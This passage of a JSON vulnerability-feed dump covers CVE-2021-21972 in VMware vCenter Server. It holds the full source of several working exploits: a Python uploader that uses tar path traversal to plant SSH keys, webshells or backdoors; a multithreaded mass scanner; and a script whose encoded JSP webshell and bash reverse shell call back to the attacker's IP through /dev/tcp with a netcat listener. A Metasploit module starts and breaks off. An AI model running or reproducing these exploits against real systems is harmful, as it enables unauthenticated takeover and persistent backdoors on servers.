"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2021", "CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-29T00:00:00", "id": "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "href": "https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-09-09T22:25:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "1337DAY-ID-35879", "href": "https://0day.today/exploit/description/35879", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 
7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + 
exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 
15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] 
Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] 
Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh [email\u00a0protected]' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux 
vCenter Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? 
[y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')\n\n# 0day.today [2021-09-10] #", "sourceHref": "https://0day.today/exploit/35879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T01:31:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "zdt", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "1337DAY-ID-35863", "href": "https://0day.today/exploit/description/35863", "sourceData": "#-*- coding:utf-8 -*-\nbanner = \"\"\"\n 888888ba dP \n 88 `8b 88 \n a88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n 88 `8b. 88' `88 88 Y8ooooo. 88 88 \n 88 .88 88. .88 88 88 88. 
.88 \n 88888888P `88888P8 dP `88888P' `88888P' \n ooooooooooooooooooooooooooooooooooooooooooooooooooooo \n @time:2021/02/24 CVE-2021-21972.py\n C0de by NebulabdSec - @batsu \n \"\"\"\nprint(banner)\n\nimport threadpool\nimport random\nimport requests\nimport argparse\nimport http.client\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nhttp.client.HTTPConnection._http_vsn = 10\nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'\n\nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\"\n\ndef get_ua():\n first_num = random.randint(55, 62)\n third_num = random.randint(0, 3200)\n fourth_num = random.randint(0, 140)\n os_type = [\n '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',\n '(Macintosh; Intel Mac OS X 10_12_6)'\n ]\n chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)\n\n ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',\n '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']\n )\n return ua\n\ndef CVE_2021_21972(url):\n proxies = {\"scoks5\": \"http://127.0.0.1:1081\"}\n headers = {\n 'User-Agent': get_ua(),\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n targetUrl = url + TARGET_URI\n try:\n res = requests.get(targetUrl,\n headers=headers,\n timeout=15,\n verify=False,\n proxies=proxies)\n # proxies={'socks5': 'http://127.0.0.1:1081'})\n # print(len(res.text))\n if res.status_code == 405:\n print(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url))\n # print(\"[+] Command success result: \" + res.text + \"\\n\")\n with open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw:\n fw.write(url + '\\n')\n else:\n print(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\")\n # except Exception as e:\n # print(e)\n except:\n print(\"[-] \" + url + \" Request ERROR.\\n\")\ndef multithreading(filename, pools=5):\n works = []\n with open(filename, \"r\") as f:\n for i in f:\n 
func_params = [i.rstrip(\"\\n\")]\n # func_params = [i] + [cmd]\n works.append((func_params, None))\n pool = threadpool.ThreadPool(pools)\n reqs = threadpool.makeRequests(CVE_2021_21972, works)\n [pool.putRequest(req) for req in reqs]\n pool.wait()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\",\n \"--url\",\n help=\"Target URL; Example:http://ip:port\")\n parser.add_argument(\"-f\",\n \"--file\",\n help=\"Url File; Example:url.txt\")\n # parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \")\n args = parser.parse_args()\n url = args.url\n # cmd = args.cmd\n file_path = args.file\n if url != None and file_path ==None:\n CVE_2021_21972(url)\n elif url == None and file_path != None:\n multithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/35863", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T13:45:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-25T00:00:00", "type": "zdt", "title": "VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-25T00:00:00", "id": "1337DAY-ID-36472", "href": "https://0day.today/exploit/description/36472", "sourceData": "# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: CHackA0101\n# Vendor Homepage: https://kb.vmware.com/s/article/82374\n# Software Link: https://www.vmware.com/products/vcenter-server.html\n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)\n# CVE: 2021-21972\n\n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md\n\n#!/usr/bin/python2\n\nimport os\nimport urllib3\nimport argparse\nimport sys\nimport requests\nimport base64\nimport tarfile\nimport threading\nimport time\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nmyargs=argparse.ArgumentParser()\nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True)\nmyargs.add_argument('-L','--local',help='Your local IP',required=True)\nargs=myargs.parse_args()\n\ndef getprompt(x):\n\tprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n\ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"):\n fullpath=\"../\" * 7 + path\n return fullpath.replace('\\\\','/').replace('//','/')\n\ndef createbackdoor(localip):\n # shell4.jsp\n backdoor = 
\"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\"\n backdoor = base64.b64decode(backdoor).decode('utf-8')\n f = open(\"shell4.jsp\",\"w\")\n f.write(backdoor)\n f.close()\n # reverse.sh \n # After decoding overwrite string 'CUSTOM_IP' for local IP \n shell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\"\n shell=base64.b64decode(shell).decode('utf-8')\n shell=shell.replace('CUSTOM_IP',localip)\n f=open(\"reverse.sh\",\"w\")\n f.write(shell)\n f.close()\n # Move on with the payload\n payload_file=tarfile.open('payload.tar','w')\n myroute=getpath()\n getprompt('Adding web backdoor to archive')\n payload_file.add(\"shell4.jsp\", myroute)\n myroute=getpath(\"tmp/reverse.sh\")\n getprompt('Adding bash backdoor to archive')\n payload_file.add(\"reverse.sh\", myroute)\n payload_file.close()\n # cleaning up a little bit\n os.unlink(\"reverse.sh\")\n os.unlink(\"shell4.jsp\")\n getprompt('Backdoor file just was created.')\n\ndef launchexploit(ip):\n res=requests.post('https://' + ip + 
'/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)\n if res.status_code == 200 and res.text == 'SUCCESS':\n getprompt('Backdoor was uploaded successfully!')\n return True\n else:\n getprompt('Backdoor failed to be uploaded. Target denied access.')\n return False\n\ndef testshell(ip):\n getprompt('Looking for shell...')\n shell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\"\n res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)\n if res.status_code==200:\n getprompt('Shell was found!.')\n response=res.text\n if True:\n getprompt('Shell is responsive.')\n try:\n response=re.findall(\"b>(.+)</\",response)[0]\n print('$>uname -a')\n print(response)\n except:\n pass\n return True\n else:\n getprompt('Sorry. Shell was not found.')\n return False\n\ndef opendoor(url):\n time.sleep(3)\n getprompt('Executing command.')\n requests.get(url, verify=False, timeout=1800)\n\t\ndef executebackdoor(ip, localip):\n url=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\"\n t=threading.Thread(target=opendoor,args=(url,))\n t.start()\n getprompt('Setting up socket '+localip+':443')\n os.system('nc -lnvp 443')\n\nif len(sys.argv)== 1:\n myargs.print_help(sys.stderr)\n sys.exit(1)\ncreatebackdoor(args.local)\nuploaded=launchexploit(args.target)\nif uploaded:\n tested=testshell(args.target)\n if tested:\n executebackdoor(args.target, args.local)\ngetprompt(\"Execution completed!\")\n", "sourceHref": "https://0day.today/exploit/36472", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-25T15:35:44", "description": "This Metasploit module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. 
Furthermore, writing an SSH public key to /home/vsphere-ui/.ssh/authorized_keys works, but the user's non-existent password expires 90 days after install, rendering the technique nearly useless against production environments. You'll have the best luck targeting older versions of the Linux appliance. The Windows target should work ubiquitously.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "zdt", "title": "VMware vCenter Server File Upload / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "1337DAY-ID-35912", "href": "https://0day.today/exploit/description/35912", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n # \"Shotgun\" approach to writing JSP\n Rank = ManualRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n include 
Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated OVA file upload and path\n traversal in VMware vCenter Server to write a JSP payload to a\n web-accessible directory.\n\n Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.\n Note that later vulnerable versions of the Linux appliance aren't\n exploitable via the webshell technique. Furthermore, writing an SSH\n public key to /home/vsphere-ui/.ssh/authorized_keys works, but the\n user's non-existent password expires 90 days after install, rendering\n the technique nearly useless against production environments.\n\n You'll have the best luck targeting older versions of the Linux\n appliance. The Windows target should work ubiquitously.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and exploit\n 'mr_me', # Co-conspirator\n 'Viss' # Co-conspirator\n ],\n 'References' => [\n ['CVE', '2021-21972'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],\n ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],\n ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],\n ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],\n ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],\n ['URL', 'https://kb.vmware.com/s/article/2143838'],\n ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']\n ],\n 'DisclosureDate' => '2021-02-23', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'win'],\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true on Windows\n 'Targets' => [\n [\n # TODO: 